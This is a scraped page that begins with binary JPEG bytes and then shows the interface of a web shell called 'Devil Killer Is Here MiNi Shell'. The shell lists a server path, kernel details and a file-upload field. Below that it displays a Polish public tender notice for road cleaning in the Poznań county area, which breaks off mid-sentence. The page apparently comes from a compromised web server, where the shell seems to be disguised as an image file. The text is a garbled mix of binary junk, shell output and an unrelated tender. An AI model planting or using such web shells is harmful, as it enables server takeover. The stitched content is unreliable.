JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230324/0015023401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprzątanie z zanieczyszczeń jezdni i wybranych elementów pasa dróg powiatowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W POZNANIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631281080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zielona 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-851</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">618593430</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">618593429</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zdp.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zdp.poznan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprzątanie z zanieczyszczeń jezdni i wybranych elementów pasa dróg powiatowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dc7f3e0d-ca0f-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00150234</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00021839/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Sprzątanie zanieczyszczeń z jezdni i wybranych elementów pasa dróg powiatowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_poznan <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/zdp_poznan</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane są za pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po których pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego. Komunikacja poprzez „Wyślij wiadomość” umożliwia dodanie do<br/>treści wysyłanej wiadomości plików lub spakowanego katalogu (załączników).2.Zamawiający będzie przekazywał Wykonawcom<br/>informacje za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany SWZ, zmiany terminu składania i<br/>otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. W przypadku rozbieżności pomiędzy treścią<br/>niniejszej SWZ a treścią udzielonych odpowiedzi, jako obowiązującą należy przyjąć treść pisma zawierającego późniejsze<br/>oświadczenie Zamawiającego.3.Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>Wykonawca, będzie przekazywana za pośrednictwem Platformy do konkretnego Wykonawcy. 4.Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 roku w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.: 1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż<br/>512 kb/s, 2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego<br/>nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 3) zainstalowana<br/>dowolna, inna przeglądarka internetowa, niż Internet Explorer,4)włączona obsługa JavaScript, 5)zainstalowany program Adobe<br/>Acrobat Reader lub inny obsługujący format plików .pdf, 6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu<br/>TLS 1.3., 7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany<br/>wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 5.Zamawiający informuje, że instrukcje<br/>korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania<br/>ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.<br/>6.Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.7.W postępowaniu o udzielenie niniejszego zamówienia, wszystkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, w tym także zapytania i wyjaśnienia dot. SWZ Zamawiający i Wykonawcy przekazują pisemnie za<br/>wyjątkiem oferty, oświadczeń i dokumentów wymienionych w Rozdziale VIII SWZ, które składa się w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">klauzula informacyjna zawarta w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">klauzula informacyjna zawarta w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZ.261.2.9.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest: Sprzątanie z zanieczyszczeń jezdni i wybranych elementów pasa dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Poznaniu.<br/>Część I - drogi powiatowe na terenie gmin: Buk, Dopiewo, Stęszew.<br/>W skład zamówienia wchodzi: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. , oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zlecenie wykonywania każdej z opcji zależeć będzie od potrzeb Zamawiającego oraz posiadania przez Zamawiającego środków finansowych. Oznacza to, że Zamawiający może zrezygnować z każdej opcji w całości lub wykorzystać każdą opcję w niepełnym zakresie. Zamawiający zastrzega sobie prawo sukcesywnego zlecania wykonania usług w ramach każdej opcji.<br/>Warunkiem skorzystania z zamówienia w ramach prawa opcji jest złożenie przez Zamawiającego oświadczenia w formie pisemnej lub w formie elektronicznej w terminie do dnia 01 września 2023 r. o skorzystaniu z opcji.<br/>Brak oświadczenia woli ze strony Zamawiającego o skorzystaniu z prawa opcji nie może stanowić podstaw do realizacji zamówienia opcjonalnego przez Wykonawcę.<br/>Zakres zamówienia obejmuje: <br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych na łącznej długości 64494mb i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. na łącznej powierzchni 31804 m² oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. na łącznej długości 64494 mb i na łącznej powierzchni 31804 m² - oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni, łącznie w maksymalnym zakresie 13 525 m2. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Wykonanie<br/>jednokrotnego oczyszczania na drogach powiatowych zgodnie z poniższym wykazem dróg:<br/>Część I (Gminy Buk, Dopiewo, Stęszew)<br/>1 m. Skórzewo 2401P 2925mb 2610mb 2220m2 w tym rondo, wyspy, miejsca postojowe, zatoki autobusowe, wyspa przejezdna<br/>2 m. Dopiewo 2401P 575mb 1020mb<br/>2402P 920mb 850mb<br/>2403P 400mb 680mb<br/>2413P 720mb 410mb<br/>Zakres: oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok<br/>autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na<br/>skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni.<br/>Warunki udzielenia wyżej wymienionego zamówienia: Zamówienie zostanie udzielone, jeśli zaistnieje potrzeba wykonania wyżej<br/>wymienionych usług oraz jeżeli Zamawiający będzie posiadał niezbędne środki finansowe, na podstawie odrębnej umowy.<br/>Zamówienie zostanie udzielone, jeżeli dotychczasowy Wykonawca realizuje lub zrealizował usługę należycie oraz zapewni standard<br/>wykonania usługi nie gorszy od standardu wykonania zamówienia podstawowego, a ponadto zaakceptuje istotne warunki<br/>dotychczasowej umowy, z zastrzeżeniem, negocjacji wynagrodzenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazane w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest: Sprzątanie z zanieczyszczeń jezdni i wybranych elementów pasa dróg powiatowych administrowanych przez Zarząd Dróg Powiatowych w Poznaniu. <br/>Część II – drogi powiatowe na terenie gmin: Tarnowo Podgórne, Rokietnica, Suchy Las.<br/>a)	zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. , oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b)	opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych, <br/>c)	opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zlecenie wykonywania każdej z opcji zależeć będzie od potrzeb Zamawiającego oraz posiadania przez Zamawiającego środków finansowych. Oznacza to, że Zamawiający może zrezygnować z każdej opcji w całości lub wykorzystać każdą opcję w niepełnym zakresie. Zamawiający zastrzega sobie prawo sukcesywnego zlecania wykonania usług w ramach każdej opcji.<br/>Warunkiem skorzystania z zamówienia w ramach prawa opcji jest złożenie przez Zamawiającego oświadczenia w formie pisemnej lub w formie elektronicznej w terminie do dnia 01 września 2023 r. o skorzystaniu z opcji.<br/>Brak oświadczenia woli ze strony Zamawiającego o skorzystaniu z prawa opcji nie może stanowić podstaw do realizacji zamówienia opcjonalnego przez Wykonawcę.<br/>Zakres zamówienia obejmuje: <br/>a) zamówienie podstawowe (gwarantowane) – jednokrotne oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych na łącznej długości 79 222mb i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. na łącznej powierzchni 51 875 m² oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>b) opcja nr 1 – oczyszczenie jezdni w maksymalnym zakresie jak w przypadku zamówienia podstawowego (gwarantowanego), tj. na łącznej długości 79 222 mb i na łącznej powierzchni 51 875m² - oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni itp. oraz ręczne oczyszczenie ścieków grzebieniowych i miejsc trudnodostępnych,<br/>c) opcja nr 2 – oczyszczanie dróg rowerowych nieprzylegających bezpośrednio do jezdni, łącznie w maksymalnym zakresie 51 500 m2. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Część II (Gminy<br/>Tarnowo Podgórne, Rokietnica, Suchy Las)<br/>Wykonanie jednokrotnego oczyszczania na drogach powiatowych zgodnie z poniższym wykazem dróg:<br/>m. Przeźmierowo 2405P 2030mb 1995mb<br/>60mb wysepki<br/>640m2 zat. autobusowe<br/>390m2 pola martwe<br/>3580m2 m. postojowe<br/>m. Tarnowo Podgórne 2404P 820mb; 930mb<br/>1872P 1620mb; 1620mb; 930m2<br/>2420P 570mb; 1565mb; 1769m2 rondo , martwe pola i wyspy oraz zatok autobusowych i park.<br/>2420P 0 droga pieszo rowerowa 890m<br/>m. Lusowo 2417P 1600mb; 2625mb<br/>2417P 4680m2 droga pieszo rowerowa 1560m<br/>2419P 500mb; 1040mb<br/>2420P 370mb; 900mb; 22m2 w tym wyspa, martwe pola, perony przystankowe<br/>rondo 857mb strona wew. i zew.<br/>m. Rokietnica 2400P 1200mb; 2050mb; 670m2 w tym rondo, wyspy i martwe pola<br/>2424P 1460mb; 1485mb<br/>2425P 110mb; 190mb<br/>2423P 200mb; 490mb; 100m2 martwe pola<br/>270mb ściek<br/>m. Kiekrz 2424P 1850mb; 1850mb; 800m2; wokół wysp, martwe pola, 5 szt. zatoki autobusowe<br/>5840m2 droga pieszo-rowerowa 1640m<br/>m. Suchy Las - ul. Sucholeska 2431P 360mb; 160mb; 180m2 w tym ściek 200m, 12m ściek grzebieniowy<br/>ul. Bogusławskiego 700mb; 700mb<br/>ul. Alejowa 670mb<br/>m. Suchy Las - ul. Złotnicka 2430P 700mb; 700mb; 250m2 Wysepki + martwe pola<br/>280mb; 280mb 0+930 - 0 +663 ciąg pieszo-jezdny<br/>m. Biedrusko 2406P 1900mb; 2200mb<br/>150mb; 40m2 rondo st. zewn.<br/>290mb; 179m2 wysepki, martwe pola<br/>7200m2 droga pieszo-rowerowa po obu str. jezdni (od mosty nad Wartą , wokół ronda) 2400m<br/>Zakres: oczyszczenie jezdni przy krawężniku, ścieków przy krawędzi jezdni, jezdni wokół wysepek oraz nawierzchni zatok<br/>autobusowych i miejsc postojowych, powierzchni jezdni wyłączonych z ruchu, wysp przejezdnych, jezdni wokół wyspy środkowej na<br/>skrzyżowaniach, wybranych zatok, dróg pieszo-rowerowych zlokalizowanych bezpośrednio przy jezdni.<br/>Warunki udzielenia wyżej wymienionego zamówienia: 